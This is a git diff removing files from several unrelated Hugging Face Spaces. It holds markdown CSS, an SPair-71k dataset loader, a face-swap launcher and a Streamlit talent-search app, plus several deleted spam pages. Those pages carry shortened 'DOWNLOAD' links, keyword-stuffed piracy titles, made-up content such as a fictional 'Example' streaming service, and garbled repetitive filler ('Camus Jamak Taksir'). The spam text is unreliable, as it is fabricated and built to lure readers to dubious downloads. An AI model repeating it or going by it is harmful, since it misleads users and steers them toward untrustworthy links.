code,.markdown-body h5 tt,.markdown-body h6 code,.markdown-body h6 tt{padding:0 .2em;font-size:inherit}.markdown-body summary h1,.markdown-body summary h2,.markdown-body summary h3,.markdown-body summary h4,.markdown-body summary h5,.markdown-body summary h6{display:inline-block}.markdown-body summary h1 .anchor,.markdown-body summary h2 .anchor,.markdown-body summary h3 .anchor,.markdown-body summary h4 .anchor,.markdown-body summary h5 .anchor,.markdown-body summary h6 .anchor{margin-left:-40px}.markdown-body summary h1,.markdown-body summary h2{padding-bottom:0;border-bottom:0}.markdown-body ol.no-list,.markdown-body ul.no-list{padding:0;list-style-type:none}.markdown-body ol[type=a]{list-style-type:lower-alpha}.markdown-body ol[type=A]{list-style-type:upper-alpha}.markdown-body ol[type=i]{list-style-type:lower-roman}.markdown-body ol[type=I]{list-style-type:upper-roman}.markdown-body div>ol:not([type]),.markdown-body ol[type="1"]{list-style-type:decimal}.markdown-body ol ol,.markdown-body ol ul,.markdown-body ul ol,.markdown-body ul ul{margin-top:0;margin-bottom:0}.markdown-body li>p{margin-top:16px}.markdown-body li+li{margin-top:.25em}.markdown-body dl{padding:0}.markdown-body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:var(--base-text-weight-semibold,600)}.markdown-body dl dd{padding:0 16px;margin-bottom:16px}.markdown-body table th{font-weight:var(--base-text-weight-semibold,600)}.markdown-body table td,.markdown-body table th{padding:6px 13px;border:1px solid var(--color-border-default)}.markdown-body table tr{background-color:var(--color-canvas-default);border-top:1px solid var(--color-border-muted)}.markdown-body table tr:nth-child(2n){background-color:var(--color-canvas-subtle)}.markdown-body table img{background-color:transparent}.markdown-body img[align=right]{padding-left:20px}.markdown-body img[align=left]{padding-right:20px}.markdown-body .emoji{max-width:none;vertical-align:text-top;background-color:transparent}.markdown-body span.frame{display:block;overflow:hidden}.markdown-body span.frame>span{display:block;float:left;width:auto;padding:7px;margin:13px 0 0;overflow:hidden;border:1px solid var(--color-border-default)}.markdown-body span.frame span img{display:block;float:left}.markdown-body span.frame span span{display:block;padding:5px 0 0;clear:both;color:var(--color-fg-default)}.markdown-body span.align-center{display:block;overflow:hidden;clear:both}.markdown-body span.align-center>span{display:block;margin:13px auto 0;overflow:hidden;text-align:center}.markdown-body span.align-center span img{margin:0 auto;text-align:center}.markdown-body span.align-right{display:block;overflow:hidden;clear:both}.markdown-body span.align-right>span{display:block;margin:13px 0 0;overflow:hidden;text-align:right}.markdown-body span.align-right span img{margin:0;text-align:right}.markdown-body span.float-left{display:block;float:left;margin-right:13px;overflow:hidden}.markdown-body span.float-left span{margin:13px 0 0}.markdown-body span.float-right{display:block;float:right;margin-left:13px;overflow:hidden}.markdown-body span.float-right>span{display:block;margin:13px auto 0;overflow:hidden;text-align:right}.markdown-body code,.markdown-body tt{padding:.2em .4em;margin:0;font-size:85%;white-space:break-spaces;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body code br,.markdown-body tt br{display:none}.markdown-body del code{text-decoration:inherit}.markdown-body samp{font-size:85%}.markdown-body pre code{font-size:100%}.markdown-body pre>code{padding:0;margin:0;word-break:normal;white-space:pre;background:transparent;border:0}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body .highlight pre,.markdown-body pre{padding:16px;overflow:auto;font-size:85%;line-height:1.45;background-color:var(--color-canvas-subtle);border-radius:6px}.markdown-body pre code,.markdown-body pre tt{display:inline;max-width:auto;padding:0;margin:0;overflow:visible;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}.markdown-body .csv-data td,.markdown-body .csv-data th{padding:5px;overflow:hidden;font-size:12px;line-height:1;text-align:left;white-space:nowrap}.markdown-body .csv-data .blob-num{padding:10px 8px 9px;text-align:right;background:var(--color-canvas-default);border:0}.markdown-body .csv-data tr{border-top:0}.markdown-body .csv-data th{font-weight:var(--base-text-weight-semibold,600);background:var(--color-canvas-subtle);border-top:0}.markdown-body [data-footnote-ref]:before{content:"["}.markdown-body [data-footnote-ref]:after{content:"]"}.markdown-body .footnotes{font-size:12px;color:var(--color-fg-muted);border-top:1px solid var(--color-border-default)}.markdown-body .footnotes ol{padding-left:16px}.markdown-body .footnotes ol ul{display:inline-block;padding-left:16px;margin-top:16px}.markdown-body .footnotes li{position:relative}.markdown-body .footnotes li:target:before{position:absolute;top:-8px;right:-8px;bottom:-8px;left:-24px;pointer-events:none;content:"";border:2px solid var(--color-accent-emphasis);border-radius:6px}.markdown-body .footnotes li:target{color:var(--color-fg-default)}.markdown-body .footnotes .data-footnote-backref g-emoji{font-family:monospace}.markdown-body .pl-c{color:var(--color-prettylights-syntax-comment)}.markdown-body .pl-c1,.markdown-body .pl-s .pl-v{color:var(--color-prettylights-syntax-constant)}.markdown-body .pl-e,.markdown-body .pl-en{color:var(--color-prettylights-syntax-entity)}.markdown-body .pl-s .pl-s1,.markdown-body .pl-smi{color:var(--color-prettylights-syntax-storage-modifier-import)}.markdown-body .pl-ent{color:var(--color-prettylights-syntax-entity-tag)}.markdown-body .pl-k{color:var(--color-prettylights-syntax-keyword)}.markdown-body .pl-pds,.markdown-body .pl-s,.markdown-body .pl-s .pl-pse .pl-s1,.markdown-body .pl-sr,.markdown-body .pl-sr .pl-cce,.markdown-body .pl-sr .pl-sra,.markdown-body .pl-sr .pl-sre{color:var(--color-prettylights-syntax-string)}.markdown-body .pl-smw,.markdown-body .pl-v{color:var(--color-prettylights-syntax-variable)}.markdown-body .pl-bu{color:var(--color-prettylights-syntax-brackethighlighter-unmatched)}.markdown-body .pl-ii{color:var(--color-prettylights-syntax-invalid-illegal-text);background-color:var(--color-prettylights-syntax-invalid-illegal-bg)}.markdown-body .pl-c2{color:var(--color-prettylights-syntax-carriage-return-text);background-color:var(--color-prettylights-syntax-carriage-return-bg)}.markdown-body .pl-sr .pl-cce{font-weight:700;color:var(--color-prettylights-syntax-string-regexp)}.markdown-body .pl-ml{color:var(--color-prettylights-syntax-markup-list)}.markdown-body .pl-mh,.markdown-body .pl-mh .pl-en,.markdown-body .pl-ms{font-weight:700;color:var(--color-prettylights-syntax-markup-heading)}.markdown-body .pl-mi{font-style:italic;color:var(--color-prettylights-syntax-markup-italic)}.markdown-body .pl-mb{font-weight:700;color:var(--color-prettylights-syntax-markup-bold)}.markdown-body .pl-md{color:var(--color-prettylights-syntax-markup-deleted-text);background-color:var(--color-prettylights-syntax-markup-deleted-bg)}.markdown-body .pl-mi1{color:var(--color-prettylights-syntax-markup-inserted-text);background-color:var(--color-prettylights-syntax-markup-inserted-bg)}.markdown-body .pl-mc{color:var(--color-prettylights-syntax-markup-changed-text);background-color:var(--color-prettylights-syntax-markup-changed-bg)}.markdown-body .pl-mi2{color:var(--color-prettylights-syntax-markup-ignored-text);background-color:var(--color-prettylights-syntax-markup-ignored-bg)}.markdown-body .pl-mdr{font-weight:700;color:var(--color-prettylights-syntax-meta-diff-range)}.markdown-body .pl-ba{color:var(--color-prettylights-syntax-brackethighlighter-angle)}.markdown-body .pl-sg{color:var(--color-prettylights-syntax-sublimelinter-gutter-mark)}.markdown-body .pl-corl{text-decoration:underline;color:var(--color-prettylights-syntax-constant-other-reference-link)}.markdown-body g-emoji{display:inline-block;min-width:1ch;font-family:Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;font-size:1em;font-style:normal!important;font-weight:var(--base-text-weight-normal,400);line-height:1;vertical-align:-.075em}.markdown-body g-emoji img{width:1em;height:1em}.markdown-body .task-list-item{list-style-type:none}.markdown-body .task-list-item label{font-weight:var(--base-text-weight-normal,400)}.markdown-body .task-list-item.enabled label{cursor:pointer}.markdown-body .task-list-item+.task-list-item{margin-top:4px}.markdown-body .task-list-item .handle{display:none}.markdown-body .task-list-item-checkbox{margin:0 .2em .25em -1.4em;vertical-align:middle}.markdown-body .contains-task-list:dir(rtl) .task-list-item-checkbox{margin:0 -1.6em .25em .2em}.markdown-body .contains-task-list{position:relative}.markdown-body .contains-task-list:focus-within .task-list-item-convert-container,.markdown-body .contains-task-list:hover .task-list-item-convert-container{display:block;width:auto;height:24px;overflow:visible;clip:auto}.markdown-body ::-webkit-calendar-picker-indicator{filter:invert(50%)}.markdown-custom-styles{color:inherit;background-color:transparent;>p,>ul,ol{margin-bottom:5px}>ul,ol{list-style:disc;padding-left:1em}& li p{margin-top:5px;margin-bottom:5px}& pre{padding:0;margin-top:10px;margin-bottom:10px}& pre code{white-space:pre-wrap;padding:10px}& img{max-width:min(80%,300px);margin-top:5px}& a:not(:has(sup)){color:inherit;text-decoration:underline}} \ No newline at end of file diff --git a/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py b/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py deleted file mode 100644 index 027bc8a654d8bf8f2799df47fdbba7f66142eeb8..0000000000000000000000000000000000000000 --- a/spaces/taesiri/ConvolutionalHoughMatchingNetworks/data/spair.py +++ /dev/null @@ -1,105 +0,0 @@ -r""" SPair-71k dataset """ - -import json -import glob -import os - -import torch.nn.functional as F -import torch -from PIL import Image -import numpy as np - -from .dataset import CorrespondenceDataset - - -class SPairDataset(CorrespondenceDataset): - - def __init__(self, benchmark, datapath, thres, split): - r""" SPair-71k dataset constructor """ - super(SPairDataset, self).__init__(benchmark, datapath, thres, split) - - self.train_data = open(self.spt_path).read().split('\n') - self.train_data = self.train_data[:len(self.train_data) - 1] - self.src_imnames = list(map(lambda x: x.split('-')[1] + '.jpg', self.train_data)) - self.trg_imnames = list(map(lambda x: x.split('-')[2].split(':')[0] + '.jpg', self.train_data)) - self.seg_path = os.path.abspath(os.path.join(self.img_path, os.pardir, 'Segmentation')) - self.cls = os.listdir(self.img_path) - self.cls.sort() - - anntn_files = [] - for data_name in self.train_data: - anntn_files.append(glob.glob('%s/%s.json' % (self.ann_path, data_name))[0]) - anntn_files = list(map(lambda x: json.load(open(x)), anntn_files)) - self.src_kps = list(map(lambda x: torch.tensor(x['src_kps']).t().float(), anntn_files)) - self.trg_kps = list(map(lambda x: torch.tensor(x['trg_kps']).t().float(), anntn_files)) - self.src_bbox = list(map(lambda x: torch.tensor(x['src_bndbox']).float(), anntn_files)) - self.trg_bbox = list(map(lambda x: torch.tensor(x['trg_bndbox']).float(), anntn_files)) - self.cls_ids = list(map(lambda x: self.cls.index(x['category']), anntn_files)) - - self.vpvar = list(map(lambda x: torch.tensor(x['viewpoint_variation']), anntn_files)) - self.scvar = list(map(lambda x: torch.tensor(x['scale_variation']), anntn_files)) - self.trncn = list(map(lambda x: torch.tensor(x['truncation']), anntn_files)) - self.occln = list(map(lambda x: torch.tensor(x['occlusion']), anntn_files)) - - def __getitem__(self, idx): - r""" Construct and return a batch for SPair-71k dataset """ - sample = super(SPairDataset, self).__getitem__(idx) - - sample['src_mask'] = self.get_mask(sample, sample['src_imname']) - sample['trg_mask'] = self.get_mask(sample, sample['trg_imname']) - - sample['src_bbox'] = self.get_bbox(self.src_bbox, idx, sample['src_imsize']) - sample['trg_bbox'] = self.get_bbox(self.trg_bbox, idx, sample['trg_imsize']) - sample['pckthres'] = self.get_pckthres(sample, sample['trg_imsize']) - - sample['vpvar'] = self.vpvar[idx] - sample['scvar'] = self.scvar[idx] - sample['trncn'] = self.trncn[idx] - sample['occln'] = self.occln[idx] - - return sample - - def get_mask(self, sample, imname): - mask_path = os.path.join(self.seg_path, sample['category'], imname.split('.')[0] + '.png') - - tensor_mask = torch.tensor(np.array(Image.open(mask_path))) - - class_dict = {'aeroplane': 0, 'bicycle': 1, 'bird': 2, 'boat': 3, 'bottle': 4, - 'bus': 5, 'car': 6, 'cat': 7, 'chair': 8, 'cow': 9, - 'diningtable': 10, 'dog': 11, 'horse': 12, 'motorbike': 13, 'person': 14, - 'pottedplant': 15, 'sheep': 16, 'sofa': 17, 'train': 18, 'tvmonitor': 19} - - class_id = class_dict[sample['category']] + 1 - tensor_mask[tensor_mask != class_id] = 0 - tensor_mask[tensor_mask == class_id] = 255 - - tensor_mask = F.interpolate(tensor_mask.unsqueeze(0).unsqueeze(0).float(), - size=(self.img_size, self.img_size), - mode='bilinear', align_corners=True).int().squeeze() - - return tensor_mask - - def get_image(self, img_names, idx): - r""" Return image tensor """ - path = os.path.join(self.img_path, self.cls[self.cls_ids[idx]], img_names[idx]) - - return Image.open(path).convert('RGB') - - def get_pckthres(self, sample, imsize): - r""" Compute PCK threshold """ - return super(SPairDataset, self).get_pckthres(sample, imsize) - - def get_points(self, pts_list, idx, imsize): - r""" Return key-points of an image """ - return super(SPairDataset, self).get_points(pts_list, idx, imsize) - - def match_idx(self, kps, n_pts): - r""" Sample the nearst feature (receptive field) indices """ - return super(SPairDataset, self).match_idx(kps, n_pts) - - def get_bbox(self, bbox_list, idx, imsize): - r""" Return object bounding-box """ - bbox = bbox_list[idx].clone() - bbox[0::2] *= (self.img_size / imsize[0]) - bbox[1::2] *= (self.img_size / imsize[1]) - return bbox diff --git a/spaces/talhaty/Faceswapper/run.py b/spaces/talhaty/Faceswapper/run.py deleted file mode 100644 index b52e5cc4a8ea9ce5cadd4e7111fb15531f380314..0000000000000000000000000000000000000000 --- a/spaces/talhaty/Faceswapper/run.py +++ /dev/null @@ -1,6 +0,0 @@ -#!/usr/bin/env python3 - -from roop import core - -if __name__ == '__main__': - core.run() diff --git a/spaces/temandata/ecommurz-talent-search-engine/app.py b/spaces/temandata/ecommurz-talent-search-engine/app.py deleted file mode 100644 index d71e873430d8f2efefdb8247a1cd9d920ed32aa3..0000000000000000000000000000000000000000 --- a/spaces/temandata/ecommurz-talent-search-engine/app.py +++ /dev/null @@ -1,179 +0,0 @@ -from typing import List - -import numpy as np -import pandas as pd -import streamlit as st -from sentence_transformers import SentenceTransformer, util -from st_aggrid import AgGrid, GridOptionsBuilder, JsCode - -st.set_page_config(layout='wide') - -@st.cache(allow_output_mutation=True) -def load_model(): - """Load pretrained model from SentenceTransformer""" - return SentenceTransformer('minilm_sbert') - -def semantic_search(model: SentenceTransformer, - query: str, - corpus_embeddings: List) -> pd.DataFrame: - """Perform semantic search on the corpus""" - query_embeddings = model.encode(sentences=query, - batch_size=128, - show_progress_bar=False, - convert_to_tensor=True, - normalize_embeddings=True) - - hits = util.semantic_search(query_embeddings, - corpus_embeddings, - top_k=len(corpus_embeddings), - score_function=util.dot_score) - - return pd.DataFrame(hits[0]) - -def get_similarity_score(model: SentenceTransformer, - data: pd.DataFrame, - query: str, - corpus_embeddings: List) -> pd.DataFrame: - """Get similarity score for each data point and sort by similarity score and last day""" - hits = semantic_search(model, query, corpus_embeddings) - result = pd.merge(data, hits, left_on='ID', right_on='corpus_id') - result['Last Day'] = pd.to_datetime(result['Last Day'], format='%d/%m/%Y', errors='coerce').dt.date - result.sort_values(by=['score', 'Last Day'], ascending=[False, True], inplace=True) - return result - -@st.cache(ttl=2*3600) -def create_embedding(model: SentenceTransformer, - data: pd.DataFrame, - key: str) -> List: - "Maps job title from the corpus to a 384 dimensional vector embeddings" - corpus_sentences = data[key].astype(str).tolist() - corpus_embeddings = model.encode(sentences=corpus_sentences, - batch_size=128, - show_progress_bar=False, - convert_to_tensor=True, - normalize_embeddings=True) - return corpus_embeddings - -def load_dataset(columns: List[str]) -> pd.DataFrame: - """Load real-time dataset from google sheets""" - sheet_id = '1KeuPPVw9gueNmMrQXk1uGFlY9H1vvhErMLiX_ZVRv_Y' - sheet_name = 'Form Response 3'.replace(' ', '%20') - url = f'https://docs.google.com/spreadsheets/d/{sheet_id}/gviz/tq?tqx=out:csv&sheet={sheet_name}' - data = pd.read_csv(url) - data = data.iloc[: , :7] - data.columns = columns - data.insert(0, 'ID', range(len(data))) - data['Full Name'] = data['Full Name'].str.title() - data['LinkedIn Profile'] = data['LinkedIn Profile'].str.lower() - data['LinkedIn Profile'] = np.where(data['LinkedIn Profile'].str.startswith('www.linkedin.com'), - "https://" + data['LinkedIn Profile'], - data['LinkedIn Profile']) - data['LinkedIn Profile'] = np.where(data['LinkedIn Profile'].str.startswith('linkedin.com'), - "https://www." + data['LinkedIn Profile'], - data['LinkedIn Profile']) - return data - -def show_aggrid_table(result: pd.DataFrame): - """Show interactive table from similarity result""" - gb = GridOptionsBuilder.from_dataframe(result) - gb.configure_pagination(paginationAutoPageSize=True) - gb.configure_side_bar() - gb.configure_default_column(min_column_width=200) - gb.configure_selection('multiple', use_checkbox=True, groupSelectsChildren="Group checkbox select children") - gb.configure_column(field='LinkedIn Profile', - headerName='LinkedIn Profile', - cellRenderer=JsCode('''function(params) {return `${params.value}`}''')) - - grid_options = gb.build() - - grid_response = AgGrid( - dataframe=result, - gridOptions=grid_options, - height=1100, - fit_columns_on_grid_load=True, - data_return_mode='AS_INPUT', - update_mode='VALUE_CHANGED', - theme='light', - enable_enterprise_modules=True, - allow_unsafe_jscode=True, - ) - -def show_heading(): - """Show heading made using streamlit""" - st.title('@ecommurz Talent Search Engine') - st.markdown(''' -
      - - [![Maintainer](https://img.shields.io/badge/maintainer-temandata-blue)](https://temandata.com/) - [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/teman-data/ecommurz-talent-search-engine) - ![visitor badge](https://visitor-badge.glitch.me/badge?page_id=temandata_ecommurz-talent-search-engine) - -
      - ''', unsafe_allow_html=True) - st.write('This app lets you search and sort talent by job title or relevant job descriptions from ecommurz talent list in real-time.') - -def get_specific_category(model, data, category, corpus_embeddings): - """Get specific category with confidence score > 0.45""" - data = get_similarity_score(model, data, category, corpus_embeddings) - return data[data['score'] > 0.45].shape[0] - -def main(): - """Main Function""" - show_heading() - - columns = ['Timestamp', 'Full Name', 'Company', 'Previous Role', - 'Experience (months)', 'Last Day', 'LinkedIn Profile'] - data = load_dataset(columns) - model = load_model() - corpus_embeddings = create_embedding(model, data, 'Previous Role') - col1, col2, col3, col4, col5, col6, col7, _ = st.columns([1.1, 1.3, 1.6, 1.65, 1.7, 2.1, 2.25, 9]) - - with col1: - data_count = get_specific_category(model, data, 'data', corpus_embeddings) - data_bt = st.button(f'Data ({data_count})') - with col2: - finance_count = get_specific_category(model, data, 'finance', corpus_embeddings) - finance_bt = st.button(f'Finance ({finance_count})') - with col3: - marketing_count = get_specific_category(model, data, 'marketing', corpus_embeddings) - marketing_bt = st.button(f'Marketing ({marketing_count})') - with col4: - social_media_count = get_specific_category(model, data, 'social media', corpus_embeddings) - social_media_bt = st.button(f'Social Media ({social_media_count})') - with col5: - arts_design_count = get_specific_category(model, data, 'design and creative', corpus_embeddings) - arts_design_bt = st.button(f'Arts & Design ({arts_design_count})') - with col6: - computer_count = get_specific_category(model, data, 'engineer', corpus_embeddings) - computer_bt = st.button(f'Computer Science ({computer_count})') - with col7: - business_count = get_specific_category(model, data, 'business and management', corpus_embeddings) - business_bt = st.button(f'Business and Management ({business_count})') - - job_title = st.text_input('Insert the job title below:', '') - submitted = st.button('Submit') - - if data_bt: - job_title = 'data' - if finance_bt: - job_title = 'finance and accounting' - if business_bt: - job_title = 'business and management' - if marketing_bt: - job_title = 'marketing' - if social_media_bt: - job_title = 'social media' - if arts_design_bt: - job_title = 'design and creative' - if computer_bt: - job_title = 'engineer and developer' - - if submitted or data_bt or finance_bt or marketing_bt or social_media_bt or arts_design_bt or computer_bt or business_bt: - print(job_title + ',' + str(pd.Timestamp.now())) - st.info(f'Showing most similar results for {job_title}...') - result = get_similarity_score(model, data, job_title, corpus_embeddings) - result = result[columns] - show_aggrid_table(result) - -if __name__ == '__main__': - main() diff --git a/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md b/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md deleted file mode 100644 index 2e882e0998e3f571ae9f811e71b2ca68cb0d9c05..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md +++ /dev/null @@ -1,23 +0,0 @@ -
      -

      How to Watch NCIS Seasons 1-12 in HD Online

      -

      If you are a fan of NCIS, the popular crime drama series that follows the cases of the Naval Criminal Investigative Service, you might be wondering how to watch all the episodes from seasons 1 to 12 in high definition online. Well, you are in luck because we have found the best HD online player that lets you stream NCIS s01-s12 complete 720p 1080p web quality without any hassle.

      -

      HD Online Player (ncis s01-s12 complete 720p 1080p web)


      Download Zip > https://bytlly.com/2uGkeK



      -

      The HD online player we are talking about is called Example, and it is a free and legal streaming service that offers a huge library of TV shows and movies, including NCIS. You can watch NCIS on Example on any device, such as your laptop, smartphone, tablet, or smart TV. All you need is a stable internet connection and a free account.

      -

      Here are some of the benefits of using Example to watch NCIS seasons 1-12 in HD online:

      -
        -
      • You can choose between 720p and 1080p resolution, depending on your preference and bandwidth.
      • -
      • You can enjoy fast and smooth streaming without any buffering or lagging.
      • -
      • You can access all the episodes from seasons 1 to 12, as well as the latest episodes from season 13.
      • -
      • You can watch NCIS with subtitles in various languages, such as English, Spanish, French, German, and more.
      • -
      • You can create your own watchlist and resume watching from where you left off.
      • -
      • You can share your favorite episodes with your friends on social media.
      • -
      -

      So, what are you waiting for? If you want to watch NCIS seasons 1-12 in HD online, head over to Example and sign up for a free account. You will be amazed by the quality and convenience of this HD online player. Don't miss this opportunity to binge-watch one of the best crime drama series ever made.

      - -

      If you are still not convinced that Example is the best HD online player for watching NCIS seasons 1-12, let us tell you more about the show and why you should watch it. NCIS stands for Naval Criminal Investigative Service, and it is a team of special agents who investigate crimes involving the U.S. Navy and Marine Corps. The show follows the adventures of Leroy Jethro Gibbs, the leader of the team, and his colleagues, such as Anthony DiNozzo, Ziva David, Timothy McGee, Abby Sciuto, and more.

      -

      NCIS is one of the longest-running and most successful TV series in history, with over 400 episodes and 18 seasons. It has won several awards and nominations, such as the People's Choice Award, the Primetime Emmy Award, and the Golden Globe Award. It has also spawned several spin-offs, such as NCIS: Los Angeles, NCIS: New Orleans, and NCIS: Hawai'i.

      -

      NCIS is not just a typical crime drama series. It is also a show that explores the personal lives and relationships of the characters, as well as their humor and camaraderie. It is a show that combines action, suspense, mystery, romance, comedy, and drama in a perfect balance. It is a show that will keep you hooked and entertained for hours.

      -

      So, if you are looking for a great TV show to watch online in HD quality, look no further than NCIS seasons 1-12 on Example. You will not regret it. Trust us.

      -

      d5da3c52bf
      -
      -
      \ No newline at end of file diff --git a/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md b/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md deleted file mode 100644 index ffb3f3e299ac063ca1d81c2e8b21ff562cfe73ca..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md +++ /dev/null @@ -1,38 +0,0 @@ -

      jagged vs sayuri


      DOWNLOAD –––––>>> https://bytlly.com/2uGkMX



      - -It supports lots of different file types: MP4, MPEG, AVI, MP3, OGG, SRT, SRT MP3. Most of the videos can be streamed. - -Best Learning, Development and Business Apps for iOS and Android - -Developer: SocialTango Inc., price: Free - -Inexpensive yet very powerful application. The most useful features for me are TTS to speech, automatic website translation, dictionary and built-in browser. With such a number of options it is very likely you will find your favourite one! - -Developer: GreenPanda, price: Free - -App for taking notes on the go. I tried over 100 different writing apps, but only GreenPanda comes near to my expectations. It allows to create a beautiful report, export to PDF and printing, and sync the notes via DropBox. It also supports text styles, types, photos, voice notes, and more. - -Developer: Cogent Labs Inc., price: Free - -Compatibility: iOS, Windows, Android, Mac OS X - -Very simple and yet powerful application for time-tracking and project management. The app can be used as a web app, mobile app or extension in Chrome or Safari. It has lots of features including hours, projects, start and end date, task time, description, etc. and it is also available for Chrome on the web, as a Chrome extension, and as a native Windows 8 app. - -Developer: LuckyCat Inc., price: Free - -Compatibility: iOS, Android, Windows, Mac OS X - -A new and unique tool for screencasting. It offers comprehensive features to create video tutorials, record video tutorials, show slides, add elements and effects, etc. It can also be used for record video, audio editing, mobile recording, online screencasting, and more. - -Developer: ZAIT Interactive Inc., price: $9.99 - -Compatibility: iOS, Android, Windows, Mac OS X, Linux - -An awesome and simple application for recording voice messages. It allows you to record voice message, send to friends or family, preview or send via iMessage, etc. Moreover, it records up to 60 seconds. - -Developer: Lokalise Inc., price: $3.99 - -For all those who are looking for a tool to organise and keep track of projects, Lobsters is a good choice. 4fefd39f24
      -
      -
      -

      diff --git a/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md b/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md deleted file mode 100644 index 7e1c95f3ec5f892ea458e99d2e3c9cf3316a3626..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md +++ /dev/null @@ -1,9 +0,0 @@ -

      Kamus Jamak Taksir Pdf Download


      DOWNLOAD » https://bytlly.com/2uGklp



      -
      -DOWNLOAD: 3dd2be366a. Related Links: Kamus Jamak Taksir Pdf Download Kamus Jamak Taksir Pdf Download Jeena Sirf Merre Liye Hd ... Camus Jamak Taksir Download Pdf. -Camus Jamak Taksir Download Pdf Camus Jamak Taksir Download Pdf Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Kamus -Download Camus Jamak Taksir Pdf Download -Camus Jamak Taksir Download Pdf Kamus Jamak Taksir Download Pdf Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf 8a78ff9644
      -
      -
      -

      diff --git a/spaces/thejagstudio/procom/procom/__init__.py b/spaces/thejagstudio/procom/procom/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md b/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md deleted file mode 100644 index 542cf2874aef2f6a0c26b21d17e582c04697bc64..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md +++ /dev/null @@ -1,72 +0,0 @@ -
      -```html -

      How to Download Kal Ho Naa Ho HD 720p Full Movie in Hindi

      -

      Kal Ho Naa Ho is a 2003 romantic comedy-drama film starring Shah Rukh Khan, Preity Zinta and Saif Ali Khan. The film was a huge hit at the box office and received critical acclaim for its story, performances and music. If you are a fan of this film and want to watch it in high quality, you might be wondering how to download Kal Ho Naa Ho HD 720p full movie in Hindi.

      -

      Well, there are several ways to do that, but not all of them are legal or safe. Some websites might offer you free downloads of the movie, but they could also infect your device with malware or viruses. Some websites might ask you to pay a fee or sign up for a subscription, but they could also scam you or steal your personal information. So, how can you download Kal Ho Naa Ho HD 720p full movie in Hindi without any risk?

      -

      downloadKalHoNaaHohd720pfullmovieinhindi


      Download Ziphttps://urlcod.com/2uK7Mc



      -

      The best way to download Kal Ho Naa Ho HD 720p full movie in Hindi is to use a reliable and reputable online platform that offers legal and secure downloads of movies and shows. One such platform is Hotstar, which is India's leading streaming service that has a huge collection of movies, shows, sports and news. Hotstar has the official rights to stream Kal Ho Naa Ho in HD quality, and you can also download it offline on your device.

      -

      To download Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar, you need to follow these simple steps:

      -
        -
      1. Download the Hotstar app on your device or visit the Hotstar website on your browser.
      2. -
      3. Sign up for a Hotstar account or log in with your existing account.
      4. -
      5. Search for Kal Ho Naa Ho in the search bar or browse through the movies section.
      6. -
      7. Select the movie and click on the download icon below the player.
      8. -
      9. Choose the HD 720p quality option and wait for the download to complete.
      10. -
      11. Enjoy watching Kal Ho Naa Ho offline on your device anytime and anywhere.
      12. -
      -

      That's it! You have successfully downloaded Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar. You can also download other movies and shows from Hotstar in the same way. Hotstar offers a free trial for new users, so you can try it out before deciding to subscribe. Hotstar also has affordable plans that suit your budget and preferences. So, what are you waiting for? Download Hotstar today and watch Kal Ho Naa Ho and other amazing content in HD quality.

      -``` - -```html -

      Now that you have downloaded Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar, you might be wondering what the movie is about. Well, here is a brief summary of the plot:

      -

      Kal Ho Naa Ho is set in New York City, where Naina (Preity Zinta) is a pessimistic and unhappy MBA student who lives with her widowed mother, her grandmother and her younger brother and sister. Her life changes when she meets Aman (Shah Rukh Khan), a cheerful and friendly neighbor who tries to help her and her family overcome their problems. Aman also falls in love with Naina, but he hides a secret that prevents him from expressing his feelings. Meanwhile, Naina's best friend Rohit (Saif Ali Khan) also realizes that he loves Naina and proposes to her. Who will Naina choose? And what is Aman's secret? Watch Kal Ho Naa Ho to find out.

      -

      Kal Ho Naa Ho is a heartwarming and emotional film that will make you laugh, cry and fall in love. The film has a brilliant soundtrack composed by Shankar-Ehsaan-Loy, with songs like "Kal Ho Naa Ho", "Pretty Woman", "Maahi Ve" and "Kuch To Hua Hai". The film also has stunning cinematography by Anil Mehta, who captures the beauty of New York and India. The film also has a stellar cast of supporting actors like Jaya Bachchan, Sushma Seth, Reema Lagoo, Lilette Dubey and Delnaaz Paul.

      -

      Kal Ho Naa Ho full movie download hd 720p
      -Watch Kal Ho Naa Ho online free hd quality
      -Kal Ho Naa Ho 2003 hindi movie download 720p
      -Kal Ho Naa Ho Shah Rukh Khan Preity Zinta movie download
